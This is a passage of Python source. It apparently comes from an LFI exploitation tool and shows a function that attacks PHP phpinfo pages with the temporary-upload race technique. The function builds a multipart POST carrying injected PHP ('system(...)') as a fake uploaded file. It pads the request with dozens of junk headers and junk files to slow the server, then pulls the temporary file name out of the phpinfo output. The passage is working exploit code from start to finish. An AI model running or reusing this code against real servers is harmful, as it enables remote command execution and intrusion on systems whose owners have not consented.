(headers,cmd,path1,path,test,host)
| 635 | return got |
| 636 | |
| 637 | def phpinfo_request(headers,cmd,path1,path,test,host): |
| 638 | rcvbuf = 1024 |
| 639 | bigz = 3000 |
| 640 | junkheaders = 30 |
| 641 | junkfiles = 40 |
| 642 | junkfilename = '>' * 100000 |
| 643 | z = "Z" * bigz |
| 644 | found = 0 |
| 645 | |
| 646 | phpinfo_headers = {'User-Agent':'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8', |
| 647 | 'Accept-Language':'en-us,en;q=0.5', |
| 648 | 'Accept-Encoding': 'gzip, deflate', |
| 649 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', |
| 650 | 'Accept-Charset': 'windows-1251,utf-8;q=0.7,*;q=0.7', |
| 651 | 'z': z, |
| 652 | 'Connection':'close'} |
| 653 | |
| 654 | if "Cookie" in gen_headers: |
| 655 | phpinfo_headers['Cookie'] = gen_headers['Cookie'] |
| 656 | |
| 657 | loop = range(0,junkheaders) |
| 658 | for count in loop: |
| 659 | phpinfo_headers['z%s' %count] = count |
| 660 | |
| 661 | phpinfo_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------59502863519624080131137623865' |
| 662 | |
| 663 | if("php://" in cmd): |
| 664 | cmd = cmd[6:] |
| 665 | else: |
| 666 | cmd = "system('%s')" %cmd |
| 667 | if(";" not in cmd[-2:]): |
| 668 | cmd = "%s;" %cmd |
| 669 | |
| 670 | content = """-----------------------------59502863519624080131137623865\nContent-Disposition: form-data; name="tfile"; filename="test.html"\nContent-Type: text/html\n\nAbracadabrA <?php %s ?>\n-----------------------------59502863519624080131137623865--""" %(cmd) |
| 671 | loop = range(0,junkfiles) |
| 672 | |
| 673 | for count in loop: |
| 674 | content = content + """-----------------------------59502863519624080131137623865\nContent-Disposition: form-data; name="ffile%d"; filename="%d%s"\nContent-Type: text/html\n\nno\n-----------------------------59502863519624080131137623865--\n""" %(count,count,junkfilename) |
| 675 | |
| 676 | phpinfo_headers['Content-Length'] = '%s' %(len(content)) |
| 677 | got = "" |
| 678 | url = "%s%s" %(host,path) |
| 679 | |
| 680 | try: |
| 681 | if(phpinfo_reverse): |
| 682 | r = requests.post(url=url, headers=phpinfo_headers, data=content) |
| 683 | else: |
| 684 | r = requests.post(url=url, headers=phpinfo_headers, data=content, timeout=20) |
| 685 | except: |
| 686 | return got |
| 687 | |
| 688 | resp = r.text |
| 689 | if("tmp_name" in resp): |
| 690 | found = 1 |
| 691 | lines = resp.split('\n') |
| 692 | for line in lines: |
| 693 | if "tmp_name]" in line: |
| 694 | mystr = str(line) |